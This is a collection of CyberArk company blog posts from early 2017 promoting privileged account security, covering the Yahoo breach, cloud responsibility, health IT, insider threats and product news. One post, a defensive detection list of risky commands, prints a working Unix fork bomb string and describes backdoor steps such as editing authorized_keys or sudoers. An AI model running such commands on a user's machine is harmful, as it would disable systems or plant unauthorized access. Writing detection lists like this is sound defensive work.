]]>
The Yahoo Breach: Privileged Account Compromise Revealed https://www.cyberark.com/blog/yahoo-breach-privileged-account-compromise-revealed/ Thu, 16 Mar 2017 19:08:30 +0000 https://www.cyberark.com/blog//

According to an article in Ars Technica, in an interview last evening, the FBI implied that the attackers who infiltrated Yahoo – including two alleged Russian FSB agents – followed a common pattern seen in many high profile cyber attacks including SWIFT and the Bangladesh Bank, the Ukraine power outage, the DNC, U.S. Office of Personnel Management (OPM) and many more. This pattern often begins with a targeted phishing attack to steal the employee’s credentials, compromise an employee’s workstation with malware, and use privileged credentials harvested from the compromised workstation to expand their attack to other assets within the enterprise.

Privileged credentials are the ultimate espionage asset – they allow attackers to quietly extend beyond their initial foothold within an organization and access its most critical data by posing as a trusted insider. If this was a spy novel, the attackers could not have done any better even if they had recruited a top-level human asset inside the organization.

In the Yahoo case, by exploiting these credentials, the attackers were able to extend their reach to compromise the Yahoo user database and use information in it to forge authentication tokens. Essentially, they were able to become ANY Yahoo user – including anyone with a Yahoo email account.

This means that the attackers could read every email, reset passwords for any website the Yahoo user may have linked to their account (such as an online banking account), or they could pose as the Yahoo user to target others with phishing emails.

According to the U.S. Department of Justice (DOJ) indictment, the attackers used this power to access the accounts of journalists, U.S. government officials, executives at prominent financial services organizations, and employees at cyber security vendors, among others. A scary reality in today’s connected world – and a major reason why information is becoming harder to trust.

This massive espionage/criminal campaign started with getting an asset inside – as in similar cases, these “assets” are privileged accounts. Many CISOs and security professionals understand that privileged accounts are the first tools adversaries seek, once within their network, to extend their reach and complete their mission. We don’t need any more reminders that shutting down the privileged account pathway must be an organizational priority.

]]>
Conjur 4.9 – Full Puppet Integration https://www.cyberark.com/blog/conjur-4-9-full-puppet-integration/ Fri, 10 Mar 2017 19:36:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-4-9-full-puppet-integration/  

Today we are proud to announce the general availability of Conjur 4.9! Conjur helps organizations large and small manage the security risk of delivering apps to the cloud by securing the Continuous Delivery pipeline. To that end, Conjur provides first-class integrations with the tools most often used to construct these pipelines.

Puppet integration

Conjur 4.9 provides a complete integration with Puppet, a configuration management platform that enables organizations to operate their infrastructure with more agility and confidence. Conjur’s Puppet integration consists of two parts: an official Puppet module and Puppet annotation support in the Conjur UI.

Puppet module

Version 1.0 of the official Conjur Puppet module is now available on the Puppet Forge.

https://forge.puppet.com/conjur/conjur

This module simplifies the operation of establishing Conjur host identity and allows authorized Puppet nodes to fetch secrets from Conjur. Compared to solutions like hiera-eyaml, our Puppet module is simpler to use and provides more visibility and flexibility for Puppet secrets workflows.

Highlights for Conjur’s Puppet integration include:

  • Secrets are never exposed to the Puppet master.
  • Node identity is established with Host Factory tokens. This avoids the need to deploy decryption keys to Puppet nodes before converge.
  • The module works with or without a Puppet master.
  • Every attempt to access a secret is recorded to Conjur’s immutable audit log.
  • Sensitive data type is supported for Puppet agents 4.6 and higher. This makes it easier to keep sensitive information out of Puppet logs.

See the Puppet Forge page for the module for complete instructions and examples.

Our Puppet module is open source and hosted on GitHub: https://github.com/conjur/puppet.

Conjur UI

The Conjur UI has been enhanced to make it easier to view and manage hosts maintained with Puppet. The Conjur Puppet module automatically applies a “puppet” annotation to any host created with a Host Factory token. Puppet hosts can now be distinguished at a glance in the Conjur UI by a prepended Puppet icon.

Additionally, any role or resource annotated with “puppet” can now be found by using the search bar in the Conjur UI. This makes it much easier to view and run security reports on the identities and secrets used by Puppet in any environment.

conjur-ui-puppet-search.png


Please see the full 4.9.0 release notes for more details and the full list of changes in this release.
Contact us for release access and upgrade instructions, or if you have any questions. We hope you enjoy this new release of Conjur!

 

]]>
To Improve Health IT Security, Recognize the Importance of Privilege https://www.cyberark.com/blog/improve-health-security-recognize-importance-privilege/ Thu, 09 Mar 2017 15:00:16 +0000 https://www.cyberark.com/blog//

The increased use of electronic medical records and rapid advances in healthcare technology have made hospitals target-rich environments for hackers. Unfortunately, the maturity of hospitals’ cyber security programs often are years behind that of other technology-dependent sectors, such as financial services. It’s no surprise that cyber security was a prominent topic at this year’s HIMSS conference.

In our conversations with industry professionals, we hear a widespread concern about the security posture at their hospitals. Outdated and unsupported software, inadequate resources, a lack of executive support, cultural resistance, and rapidly evolving technology have left hospitals vulnerable to attacks such as the ransomware exploit that forced Hollywood Presbyterian Medical Center to pay a $17,000 ransom to regain access to its network last year.

The problem is not limited to ransomware or network access. Poor cyber security hygiene makes networked medical devices on the hospital floor vulnerable to breaches, potentially putting patients’ health and lives in the hands of intruders. Properly managing access to privileged accounts and critical devices can mitigate risk and significantly boost hospitals’ cyber security posture.

The healthcare environment

Hospitals and medical centers are complex environments where advanced technology is supported by networks that were not wholly designed for it. Networked monitors, infusers, ventilators, etc. provide improved patient healthcare and reduce staff burden, and their deployment can increase the number of network endpoints by the thousands. The nature of these devices – they are critical to the health of patients — creates a conflict often seen with operational technologies and advanced security controls.

In a budget-conscious industry that struggles to control costs, decision makers without an understanding of IT often do not prioritize the critical task of cyber security. The mix of administrative, medical and technical users on the network also makes it difficult to get a stakeholder consensus on changes needed to improve security. This problem can be compounded in teaching hospitals, which like most universities, emphasize access and sharing.

The privilege pathway

The importance of controlling access to privileged accounts on connected devices was demonstrated last year when a massive distributed denial-of-service (DDoS) attack was launched against Dyn, a provider of Internet services to Internet sites. It was reported that the attack was conducted using millions Internet of Things devices compromised by the Mirai malware, which relied on factory-default user names and passwords to infect them.

These user names and passwords were easily available and intruders were able to access and install Mirai malware on thousands of online devices such as digital video recorders and IP cameras. Because device owners did not change the default settings they became part of a massive botnet used to launch DDoS attacks.

The impact of this risk goes beyond consumer devices and DDoS attacks. Privilege—the ability to use accounts that give users wide-ranging powers on a network and devices—is one of the first things an intruder looks for in an attack. Default administrative passwords are an easy way for intruders to get onto the privilege pathway and enabling them to complete their mission. This can put medical equipment on the hospital floor at risk of compromise; and the stakes with these devices are much greater and the threat more urgent.

Blocking the privilege pathway raises the bar for attackers by increasing the amount of effort and level of skills needed for a successful attack.

Mitigating the risk with good cyber security hygiene

Practicing good security hygiene in the form of proper password management is an effective way to reduce the risk from a breach. Managing access privileges does not mean denying them. Ensuring that default passwords are not being used, that administrative passwords are not being shared, and that all passwords are properly managed secures privileged accounts without disrupting access by those who need it.

This can be done without changing processes or disrupting established procedures. CyberArk has developed a powerful, modular technology platform that provides a comprehensive Privileged Account Security Solution to address this threat enabling healthcare organizations to take a painless first step in maturing IT security.

 

]]>
Cloud Security: Who is Responsible for What? https://www.cyberark.com/blog/cloud-security-responsible/ Tue, 07 Mar 2017 16:04:23 +0000 https://www.cyberark.com/blog//

Today, the benefits of cloud computing are very well established: it is less costly and provides increased flexibility and agility, including the ability to support on-demand computing at scale. The debate surrounding the security of cloud computing, specifically whether data was more secure in the cloud or not, has for the most part been settled. A growing number of organizations now view the cloud as secure, and in many cases, more so than an on-premises deployment.

Infrastructure-as-a-Service (IaaS) and Platform-as-a-service (PaaS) – where a company’s own applications and assets run on infrastructure operated by the public cloud vendors — have also grown in popularity. Amazon Web Services (AWS) and Microsoft Azure have experienced significant growth, in part because of the relative ease for an organization to set up and deploy their applications at scale in cloud environments.

Public cloud vendors focus on the security of the cloud infrastructure, including the compute, storage and networking resources as well as the physical infrastructure, but they recognize that they are only able to provide a partial solution. In fact, as each of the public cloud vendors point out, security in the cloud is a shared responsibility – with the organization as the application owner being responsible for protecting applications, the OS, supporting infrastructure, and other assets running IN the cloud.

Essentially, everything above the hypervisor or equivalent layer is the responsibility of the application owner. Organizations may also need to configure some of the services provided by the cloud vendor. For example, basic perimeter security is included with the cloud vendor’s infrastructure, but it is configured by the customer.

In case there is any doubt, the AWS Customer Agreement, for example, is very clear on the limits of AWS’ responsibilities for securing the enterprise’s applications and data. The liability is limited to refunding what the enterprise paid AWS for services in the past year. As a speaker at the recent HIMSS healthcare IT conference pointed out, even if the cloud vendor could be proven to be at fault for a breach, and that’s a big if, it’s very unlikely the enterprise would be covered for direct financial loss caused by the loss of patient’s medical records. On top of that, there are other costs including regulatory fines, reputational loss and, most importantly, impact on the organization’s customers.

While the public cloud vendors take steps to ensure the security OF the Cloud, ultimately, just like with an on-premises data center, it is the enterprise and application owner that is responsible for security IN the Cloud, and for ensuring that your customer’s data is secure.

Unfortunately, that message may not be getting through to all cloud users. A recent survey carried out as part of a webinar I gave to security professionals revealed that 19 percent of respondents rely on the cloud vendor’s security while 28 percent use a mixture of third-party security and the cloud vendor’s technology. A further 16 percent said their security arrangements varied based on the specific application or business unit.

Organizations that rely solely on a cloud vendor’s built-in security are potentially exposing their organization to unnecessary risk.

While there are multiple steps required to protect cloud infrastructure, particularly when it comes to IaaS/PaaS, for most organizations it makes sense to start with the cloud vendor’s management console. With a public cloud vendor such as AWS or Azure, the enterprise’s entire cloud infrastructure is accessed through the cloud vendor’s management console. This management console is incredibly powerful and really does hold the “keys to the Cloud kingdom, even more so than for the on-premises admin consoles.

The management console typically enables:

  • Set up and configuration of the entire cloud infrastructure – allocating resources, setting up applications, compute instances, determining the regions and zones the apps run in
  • Setting security parameters, delegating authority and enabling others to have access
  • Billing, and purchasing of applications from the marketplace

Unfortunately, the management console is also an attractive target and likely the entry point for an attacker, given the human administrator’s vulnerability to phishing. So a first step in securing the cloud assets is to make sure that the enterprise locks down controls and monitors the management console and secures the associated credentials.

Fortunately, for most organizations this first step of ensuring that the credentials for accessing the management console are secure should be relatively straightforward.  In fact, CyberArk’s customers use our digital vault infrastructure to secure, rotate and control access to the privileged passwords used to authenticate to the management console.

Another critical step is to protect the credentials that applications and other assets running in the cloud need to access resources, such as customer databases and other assets. Unfortunately, the required credentials are all too often hardcoded in applications and this is a troubling and unnecessary vulnerability which needs to be addressed. Today developers and cloud administrators use CyberArk Application Identify Manager (AIM) to eliminate embedded credentials in cloud applications, by storing the credentials in the CyberArk digital vault, rotating and controlling application credentials according to policy, etc.

Taking these steps helps organizations address their responsibilities to ensure the security of their cloud applications and to meet their compliance needs. An added benefit is that the same digital vault infrastructure can be used to secure credentials for not only the public cloud management consoles and cloud applications, but also for all the other privileged credentials and passwords used to secure on-premises and hybrid environments, as well as DevOps tools. This is extremely important to CISO and IT leaders wanting to follow the best practice of enforcing the same security policies across the enterprise regardless of the compute environment.

 

]]>
Q&A with CyberArk’s Adam McCord on the Cyber Security Landscape in Latin America https://www.cyberark.com/blog/qa-cyberarks-adam-mccord-cyber-security-landscape-latin-america/ Tue, 28 Feb 2017 16:28:06 +0000 https://www.cyberark.com/blog//

Adam McCord was named CyberArk’s vice president of sales for Latin America in January, bringing with him 17 years of cyber security experience in a variety of sales and leadership roles in this dynamic and expanding market.

CyberArk enables organizations to defend against both insider threats and external attackers who have made it past the network perimeter by securing access to privileged accounts, thereby limiting an attacker’s ability to move throughout the enterprise network. In his new position, McCord is responsible for expanding the regional sales team and partner network in Latin America to increase awareness and improve access to CyberArk solutions.

We spoke recently with McCord about the cyber security challenges faced by Latin American organizations and the role of privileged account security in proactive security programs.

CyberArk: Congratulations on your new role, Adam. You’ve worked for many years in Latin America, how would you characterize the market?

McCord: There are 50 countries in this territory, and all of them have different regulatory, budgetary and risk profiles. But the common denominator is that attacks are becoming more frequent and the impact of those attacks has become more significant over the last few years. In the past, attacks were more operationally targeted, and today they are more economically targeted. To paint a picture, industry experts project that global organizations will lose a staggering $2 trillion annually from malicious cyber activities by 2019. In Latin America today, approximately $90 billion is lost each year due to cyber crime, and that number is expected to surge as many local organizations remain ill-prepared to deal with developing security risks. It’s estimated that the total, average cost of each of these data breaches is $4 million globally.

The regulatory environment is also significantly stricter today than it has been in the past, driving awareness within organizations, not just of properly managing and protecting privileged accounts, but also of the overall threat environment. Businesses are making investments commensurate with that risk. Another common denominator is the insider threat, which is difficult to manage. From what we have seen in the region, roughly 70 percent of exfiltrated data comes from intentional breaches from within.

CyberArk: What is the status of the CISO in Latin America today?

McCord: Until a few years ago many organizations did not have the office of the CISO; it was a managerial role within the organization. It wasn’t on par with or reporting into the CIO. Today more organizations have a CISO – a person in charge of building a security program who holds a portion of the IT budget. They might call the role something else, but at the end of the day that’s what it is. Organizations understand that in this day and age, to mitigate the risk of appearing negatively on the front page, they’d better have a strong CISO office and a dedicated security program.

CyberArk: What conversations are you having with CISOs?

McCord: Today most assume that the perimeter has been breached and there are bad actors on the network, and the only way to avoid a grievous breach is by removing critical access from those users.

They understand that attackers need to escalate privileges and leverage credentials in order to move laterally and steal data, and as a result, they agree that it is necessary to secure privileged accounts. If you can’t escalate privileges you can’t move. If you can’t move, you can’t find the data. And if you can’t find the data, you can’t steal it. They also know that after a breach, changing all the passwords on critical systems is the first action to begin to rebuild a trusted environment. When they put these two things together, CISOs can take a proactive, preventative approach to help avoid serious breaches.

CyberArk: You mentioned that insider threats are a growing concern. How is this challenge being met?

McCord: There is very little that traditional security can do to stop bad actors inside the network. Everybody has a potential Snowden—the high level admin who is basically God on the network—and they can escalate, they can move, they can make changes, erase logs; they can do pretty much anything they want. Organizations don’t have any way to track and prevent this.

You can have the best technology on the perimeter, but at the end of the day, a malicious user on the network can get around any perimeter-based technology. So it is the protection on the privileged accounts that mitigates those kinds of breaches. This is the last line of defense before your data takes a walk out the door.

CyberArk: What about privilege-related risks in the cloud? Are these being addressed?

McCord: The need to control privileged accounts on the network is understood, and the next logical step is the cloud. Everybody is doing something in the cloud, or will be in the near future. And they’re not moving trivial applications—they’re moving major applications. The cloud creates new challenges in securing and managing privileged accounts – the attack surface is larger and extremely dynamic. CISOs realize the need to leverage the same technology to protect those resources, no matter where they’re located. It’s a natural progression.

————————————————————————

You can learn more about CyberArk’s solutions for privileged account security here.

]]>
RSA Conference 2017: Privileged Account Security across the Enterprise https://www.cyberark.com/blog/rsa-conference-2017-privileged-account-security-across-enterprise/ Fri, 24 Feb 2017 16:28:23 +0000 https://www.cyberark.com/blog//

With record-breaking attendance and a jam-packed agenda of thought-provoking keynotes, technical sessions, tutorials and seminars, this year’s RSA Conference was not one to miss. Everywhere you turned, there was something new to learn and see—from debating about how artificial intelligence and machine learning could shape the industry’s future, to meeting young startups approaching security challenges in interesting new ways, to participating in lively technical discussions with peers and partners. With more than 43,000 people in attendance, I can’t help but wonder if, after 26 years, it is time to move the RSA Conference to Vegas!?

Just like the conference, there wasn’t a dull moment at the CyberArk booth. After kicking off the show by announcing our new insider threat detection capabilities, we hosted record numbers of attendees for one-on-one demos, small group discussions and partner presentations with several of our C3 Alliance members. Throughout the week, one thing was clear: Organizations have graduated from the education stage and fully understand that privilege is the one constant in the cyber attack lifecycle.

Throughout the week, several buzzwords and hot topics topped the charts:

  • Insider Threats: An insider who has gained access to privileged credentials can initiate seemingly legitimate privileged user sessions, making it incredibly difficult to detect. Our newly announced capability automatically analyzes all privileged users’ session activity to instantly identify high-risk activity and alert security teams to a potential incident before it’s too late. By automating this process and detecting more threats faster, organizations can gain an opportunity to disrupt inside attackers—and careless users—before these incidents turn into costly, reportable breaches.
  • Endpoint: The vast majority of advanced attacks start at the endpoint when attackers breach the perimeter and target credentials. To help organizations better detect and contain cyber attacks, we’ve combined targeted analytics with proven privilege management and application control capabilities—so that organizations can effectively lock-down privileges on the endpoint without impacting productivity.
  • Cloud Migration: Accelerated cloud migration requires IT leaders to implement more effective risk management strategies from the start in order to better protect against advanced threats. We can help to eliminate the security gaps across public, private, hybrid cloud and SaaS environments by protecting all privileged accounts—wherever they are.

These topics were also highlighted in Brandon Traffanstedt’s RSA session entitled “The Privilege Connection: Cloud, DevOps and Stopping Advanced Threats.” During this talk, he outlined best practices for reducing the attack surface by securing privileged accounts across the enterprise—on-premises, in the cloud and on endpoints, as well as privileged credentials used by DevOps automation and orchestration tools.

Rounding out the week was CyberArk CEO Udi Mokady’s appearance on the panel, “Meet the Leaders of the Startup Nation.” He, along with a panel of industry experts, ex-intelligence officers and leading academics, talked about how Israel became known as the “Startup Nation.”

To top it all off, we received an SC Award for Best Identity Management Solution. We couldn’t be more proud of our team and are honored to be recognized by the SC Awards for this commitment to innovation and product excellence.

Thanks to our customers, partners and team, RSA 2017 is a show we won’t soon forget. See you next year.

]]>
Don’t Analyze Everything – Analyze the Right Thing to Detect and Respond to Insider Threats https://www.cyberark.com/blog/dont-analyze-everything-analyze-right-thing-detect-respond-insider-threats/ Tue, 14 Feb 2017 13:58:22 +0000 https://www.cyberark.com/blog//

In 2013, organizations worldwide started to take insider threats seriously, thanks to a man named Edward Snowden. Yet, his is just one of many cases of authorized insiders who have caused damage – both intentionally and accidentally – to the organizations that trusted them.  From the Sage Group incident in the UK to the case of Harold Martin to, most recently, the IT admin who allegedly held a university’s email system hostage in exchange for $200,000, insider threats are a constant in today’s world.  What’s worse, these examples don’t even begin to touch on the 50 percent of breaches each year that are caused by inadvertent human error.

Today, CyberArk announced a new capability that helps organizations automatically detect and quickly respond to insider threats. The solution automatically records and analyzes all privileged users’ sessions to instantly identify high-risk activity and alert security teams to a potential incident before it’s too late. By automating this process and detecting threats faster, organizations can gain an opportunity to disrupt inside attackers – and careless users – before these incidents turn into costly, reportable breaches. Here’s how you can use this new capability to improve your insider threat detection, investigation and response processes:

Identify and define risks. Define the activities that are particularly high-risk in your organization, and customize your solution to alert you when these activities occur. The activities considered “high-risk” will likely differ from organization to organization, but if you’re not quite sure where to start, check out these recommendations as a starting point.

Track everything. When your privileged users access high-value systems, record everything they do. By tracking each and every action they take during privileged sessions, you’ll have a data stream that can be automatically analyzed. If something suspicious occurs, you’ll have a full video recording to review exactly what happened.

Automate threat detection. You don’t have the time to manually sift through session recordings to look for suspicious behavior – nor should you. Automate the review of privileged user sessions to detect high-risk activity as soon as it occurs.

Respond quickly. With the automated review of user activity, you can be alerted to potential insider attacks immediately. Once you see the alert, you can investigate the situation, watch the suspicious session if it’s still in-progress, and terminate the session to stop any further damage from occurring.

Prioritize audit review. Enable your auditors to be more effective. By applying risk indexes to recorded sessions, auditors can easily prioritize sessions for review, complete audits faster and deliver greater value to the business.

When it comes to threat detection, there is a lot of data you can analyze, but to protect your organization’s most sensitive assets, you need to focus on what matters most. By proactively analyzing privileged user activity on high-value assets, you can focus your efforts on your most sensitive users and information to gain prioritized, actionable alerts that can help you quickly detect and respond to attackers inside your network.

Read this eBook to learn who your insiders really are, and watch this whiteboard video to learn more about how the solution works.

]]>
Spot Insider Threats: 10 Commands Commonly Used During the Cyber Attack Cycle https://www.cyberark.com/blog/spot-insider-threats-10-commands-commonly-used-cyber-attack-cycle/ Tue, 14 Feb 2017 13:30:10 +0000 https://www.cyberark.com/blog//

Today, CyberArk announced a new capability that helps organizations automatically detect insider threats and accelerate incident response times. With this integrated release of CyberArk Privileged Threat Analytics and CyberArk Privileged Session Manager, customers can now receive customizable, prioritized alerts on high-risk user activity – during privileged sessions – to help security teams swiftly investigate and disrupt potential insider attacks.

Throughout the course of this release, we worked closely with our customers to understand their privileged threat detection needs and gain insight into how they prefer to receive alerts. Over the course of this process, we heard two pieces of feedback time and again.

First, customers want to customize detection capabilities so that, over time, they can tailor alerts to their specific needs. I’m happy to share that with this release we’ve provided that flexibility.

Second, because of our expertise in the privileged account security space, customers have asked us for ideas on what types of high-risk activity to look for initially. To help answer this question, we consulted with experts from CyberArk Labs and our customers’ security operations teams to develop a list of ten commands that are frequently associated with malicious – or accidentally damaging – behavior.

It’s always worth noting that no two situations are the same, so an action that may be harmless in one situation may create a major security issue in another. However, in the spirit of sharing what we learned, here are ten highly sensitive commands that were frequently cited as being indicative of risk:

  1. mmc.exe, Active Directory Users and Computers – This action opens a window in which a Windows user can add new user accounts to the domain. This could indicate that an attacker is creating backdoor access to establish persistence throughout the entire Windows domain.
  1. explorer.exe, User Accounts – As suggested by its name, this action opens a window in which a Windows user is able add new accounts to the system. This could indicate that an attacker is creating backdoor access to the system to establish persistence.
  1. regedit.exe, Registry Editor – This action opens a window that provides access to the Windows registry. From the registry, a user can change critical system configurations, alter security settings and access sensitive credential data on the system. CyberArk Labs research demonstrates how malicious users can alter registry settings to steal credentials.
  1. mmc.exe, Windows Firewall with Advanced Security – Access to the Windows Firewall enables users to modify security configurations on a system. Access to firewall settings may indicate that an attacker is disabling security controls on the machine to make the next steps of the attack chain easier.
  1. mmc.exe, Network Policy Server – The Windows Network Policy Server enables users to modify the network configuration. Access to this window could indicate that an attacker is enabling unauthorized access to or from the machine.
  1. authorized_keys – Commands containing “authorized_keys” can provide access to the authorized keys files on *nix systems. From this file, a user can add unauthorized SSH keys to the machine. Access to this file may indicate that an attacker is creating backdoor access to the system to establish persistence.
  1. sudoers – Commands containing “sudoers” can provide access to the sudoers file on *nix systems. Within this file, a user is able to manipulate user privileges on the system. Such an action could indicate that an attacker is granting unauthorized permissions to an account, which can be used at a later time to cause damage.
  1. :(){ :|: & };: – When entered on *nix systems, this sequence of characters operates a fork bomb to consume all machine resources and make the server unusable. These characters would not be entered accidentally, and thus represent an intentional attempt to harm the organization.
  1. tcpdump – When entered on *nix systems, this action dumps all accessible network packets. The use of this command may indicate that an attacker is attempting to learn about the communication channels of the machine and use that information to plan the next steps in the attack.
  1. rm – When entered on *nix systems, this command enables a user to delete files and directories. Such an action may indicate that a user is trying to harm the machine to potentially disrupt business.

While this list can be used as a starting point, it’s always important to keep in mind that every environment is different. When deciding which commands to detect initially, it’s important to consider what systems you run, what systems store your most sensitive information and what actions occur on a day-to-day basis within your organization. We’re here to help you understand potential risks and share knowledge from both our in-house and customer experts.

To learn more about our new ability to automatically detect potential insider threats, read this article.

]]>
When Innocent Mistakes Turn Into Costly Problems https://www.cyberark.com/blog/innocent-mistakes-turn-costly-problems/ Thu, 09 Feb 2017 14:57:12 +0000 https://www.cyberark.com/blog//

When most people hear about an “insider threat,” they often assume it’s a malicious employee who is either out to prove a point or trying to selfishly make a buck. Yet, as one startup learned last week, the real “insider threat” is often a well-intentioned person who, in the course of simply trying to do his or her job, accidentally causes something to go wrong.

Human error is a prevalent cause of accidents, which means IT and security teams should prepare accordingly to limit the resulting damage.  Here are a few steps organizations can take to limit the impact of accidental insider damage:

  • Control executables. Even the most security-aware users fall victim to spear-phishing attacks. By controlling what’s allowed to execute on your systems, you can block attackers’ malware from taking over devices and unknowingly exploiting legitimate user privileges.
  • Get rid of unnecessary privileges. In the case of GitLab, the team member who accidentally deleted a production database was, in fact, authorized to do so. Yet, too often that’s not the case. According to one recent survey, 91 percent of insiders have access to systems that they shouldn’t. If you can’t access it, you can’t break it.
  • Monitor user activity. Something about being watched by an authority figure encourages people to think twice about their actions. By recording all activity as users access sensitive IT systems, you can encourage your most privileged users to double check their work and discourage any foul play. This means fewer mistakes, fewer malicious actions and less damage to clean up.
  • Backup. Then backup some more. If IT teams learned one thing in 2016 (or “The Year of Ransomware” if you read the news), it’s that backing up sensitive data is an imperative. Whether an IT admin accidentally deletes an entire database or a cybercrime ring takes your servers hostage, backups are extremely handy. Just ask any of the companies who learned this lesson the hard way.

You can’t predict which users are accidentally going to damage your systems or fall victim to well- disguised attackers, but you can predict that these things will happen – and more than once. However, with some preparation, you can make sure that when these incidents occur the repercussions are minimal.

]]>
The Value of Experience: Leveraging Peer-to-Peer Guidance https://www.cyberark.com/blog/value-experience-leveraging-peer-peer-guidance/ Tue, 07 Feb 2017 14:35:41 +0000 https://www.cyberark.com/blog//

There is a story of a man trapped in a deep hole, shouting for help. A second man passing by hears the calls and jumps into the hole with him. “Why did you do that?” the first man asks. “Now we’re both down here!”

“Yes,” the second man replies, “but I’ve been here before, and I know the way out.”

If you feel like you’re in over your head trying to implement cyber security and incident response programs for your organization, you are not alone. Your peers have been there, and their experience and advice can help you to get to where you need to be in 2017.

Don’t reinvent the wheel

The unfortunate reality is that every organization today is a target and must not only secure itself against cyber attacks, but also be prepared to respond to data breaches and other security incidents. Constantly evolving threats exploit long-standing vulnerabilities in the enterprise, and in many instances compromises go for months before detection.

Assume that a breach will occur at some point and be prepared to address it. But forewarned is forearmed, and there is no reason to wait until it occurs or to reinvent the wheel.

In a keynote address at a forum in Boston on the State of Cybersecurity, CyberArk Chairman and CEO Udi Mokady noted that cyber security is a team sport, not an individual competition. As attackers become more organized and share resources, it is important that defenders also share their experiences. Collectively, the community will benefit from the lessons learned rather than starting from scratch as each threat appears.

Lessons learned

What those who have been there already know is that strong controls are needed on privileged accounts and credentials to block intruders and limit their access to critical assets.

Attackers take advantage of common weaknesses in credential management, exploiting the way administrative credentials are stored in memory on Windows machines. Giving unnecessary administrative access to end users and to IT admins, using default passwords or cloning workstation images, allowing the use of the same local administrator password — these are all bad practices that can open up your network and your data to an intruder who has made it past the perimeter.

Once intruders have gained a foothold on a workstation using a stolen admin password, they can move to other workstations using the same password or extract password hashes for recent log-ins from computer memory. Intruders can move not only laterally throughout the system, but they can also escalate privileges to gain access to higher value assets.

The value of experience

The latest CISO View report, which draws on the experience of security experts who were involved in the aftermath of some of the most devastating breaches in the last 24 months, offers a framework for a cyber security sprint that can help your organization rapidly reduce privileged credential risk. This framework, a 30-day sprint to protect privileged credentials, has been reviewed and validated by The CISO View panel: top security executives from ING Bank, CIBC, Rockwell Automation, Lockheed Martin, Starbucks, ANZ Banking Group Limited, CSX Corporation, Monsanto Company, Carlson Wagonlit Travel, SGX, News UK and McKesson.

By leveraging the experience of professionals who have been on the front lines, or have made privileged account security a core part of their security programs, organizations can follow a proven plan to implement  essential security controls needed to protect high-risk privileged accounts now, rather than scrambling to put them in place after a breach has occurred.

You don’t have to start from scratch. Take advice from your peers and read “The CISO View report: Rapid Risk Reduction: A 30 Day Sprint to Protect Privileged Credentials.”

]]>
Conjur and Shadow-Soft Form Partnership to Deliver Trust Management for Cloud Applications https://www.cyberark.com/blog/conjur-and-shadow-soft-form-partnership-to-deliver-trust-management-for-cloud-applications/ Tue, 24 Jan 2017 14:35:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-and-shadow-soft-form-partnership-to-deliver-trust-management-for-cloud-applications/  

Collaboration Delivers Secrets Management at Scale for Shadow-Soft Customers

WALTHAM, Mass., January 24, 2016 — Today Conjur, a trust management platform for the cloud, has announced a partnership with Shadow-Soft, a solution integrator specializing in DevOps, cloud migrations and security. Shadow-Soft will provide and integrate Conjur’s trust management software solution for existing clients and new customers to add stronger, more scalable security capabilities as they migrate to the cloud.

As DevOps and cloud infrastructure deployments mature, the applications they host become more important and the threats facing their security become more acute. Shadow-Soft saw a need among companies facing these challenges to employ a more robust approach to identity and access rights for the building blocks of their cloud infrastructure like VMs, AMIs and containers. Conjur will now address this key requirement for new and existing Shadow-Soft customers.

“Working with Conjur allows us to offer a solution our customers increasingly need,” said James Chinn, CEO of Shadow-Soft. “Like Conjur, we are committed to helping companies securely embrace the cloud and effectively manage their infrastructure once they get there. This partnership allows us to bring Conjur’s trust management platform and the security it offers to our customers, enabling them to deploy important applications in the cloud with confidence.”

“Shadow-Soft is an ideal partner for Conjur because of their cloud focus, commitment to innovation and security savviness,” said Elizabeth Lawler, CEO and co-founder of Conjur. “Shadow-Soft’s clients are moving rapidly along the cloud adoption maturity curve. As they deploy increasingly important applications in the cloud, they need to manage secrets at scale, integrate security across their new tool chains, and leverage existing trust systems. Our trust management software is uniquely able to allow them to do all these things, and Shadow-Soft is perfectly positioned to leverage Conjur to help clients move forward securely with their cloud initiatives.”

About Conjur

Conjur delivers a trust management software platform that enables organizations to balance their goal of adopting cloud computing with their need to ensure security. Conjur automates machine identity provisioning, authorization of privileged access, service account control, and machine-to-machine connectivity in a way that meets the needs of all DevSecOps stakeholders. Companies adopting dynamic, cloud-centric IT infrastructure across industries, including financial services, communications, media and software development, consider Conjur an essential component of their security strategy. Conjur is headquartered in Waltham, Mass., and is backed by Amplify Partners, Avalon Partners and Koa Labs. For more information, please visit www.conjur.com or follow @conjurinc on Twitter.

About Shadow-Soft

Shadow-Soft is an award-winning, Open Source integrator, committed to solving critical business challenges using open technologies. For nearly a decade we’ve been the leader in DevOps, Middleware, Cloud, Big Data and Security solutions. Our expert consulting and managed services teams specialize in migrating legacy applications, modernizing and optimizing infrastructure, deploying Agile & DevOps methodologies through orchestration & automation, and maintaining these environments on public or private clouds. We are headquartered in Atlanta, with offices in Reston, Virginia and Charleston, South Carolina. For more information, please visit www.shadow-soft.com or follow @ShadowSoftNews on Twitter.


Media Contact:
Lesley Sullivan
LaunchSquad
617-945-1915
conjur@launchsquad.com

 

]]>
Russians, APTs and Cyber Security: What’s So Common about Common Sense Anyway? https://www.cyberark.com/blog/russians-apts-cyber-security-whats-common-common-sense-anyway/ Tue, 24 Jan 2017 13:00:49 +0000 https://www.cyberark.com/blog//

While the world awaits the next titillating chapter of the ongoing saga involving Russia and the U.S. presidential election, there is one section of the recently released Joint Action Report (JAR) compiled by the DHS and FBI that has gone unnoticed and woefully under-reported — and worth digging into.

Yes, there was a lot of discussion as to whether the JAR achieved the goal of proving the Russians tampered with the US election, but I didn’t see one report on the section that every business and agency should pay attention to – the mitigation strategies to prevent cyber attacks.

In the “Top Seven Mitigation Strategies” section of the report, the DHS states:

DHS encourages network administrators to implement the recommendations below, which can prevent as many as 85 percent of targeted cyber-attacks. These strategies are common sense to many, but DHS continues to see intrusions because organizations fail to use these basic measures.

Let that sink in…8 out of 10 cyber-attacks could be stopped if organizations embraced “common sense” and basic cyber security strategies.

Is Common Sense Really That Common?

It can’t be that easy, right? Surely the DHS is highlighting advanced cyber security strategies that are too timely, costly and intrusive for organizations to implement. Let’s look at the recommendations:

  1. Patch applications and operating systems
  2. Application whitelisting
  3. Restrict administrative privileges
  4. Network segmentation and segregation into security zones
  5. Input validation
  6. File reputation/AV tuning
  7. Understanding firewalls

Well, I have to agree with DHS on this one – these are basic, they are common sense, and they are imminently achievable by any organization that cares a modicum about cyber security. Yet far too many organizations either aren’t aware of basic security best practices, or worse, simply choose to ignore them.

